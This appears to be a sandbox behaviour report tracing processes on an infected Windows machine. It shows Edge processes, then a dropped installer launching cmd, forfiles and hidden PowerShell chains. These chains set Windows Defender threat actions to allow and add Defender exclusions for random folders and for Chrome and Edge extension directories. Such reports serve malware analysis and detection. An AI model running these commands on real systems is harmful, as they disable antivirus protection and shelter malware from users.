C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=3984,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5308,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=5472 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5428,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=5624 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5500,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=5624 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=5852,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=5864 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6444,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=6468 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6464,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=6596 /prefetch:81⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6332,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --field-trial-handle=6252,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=6848 /prefetch:11⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6428 -ip 64281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5680 -ip 56801⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS782F.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS782F.tmp\Install.exe it /giAdidFZjj 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
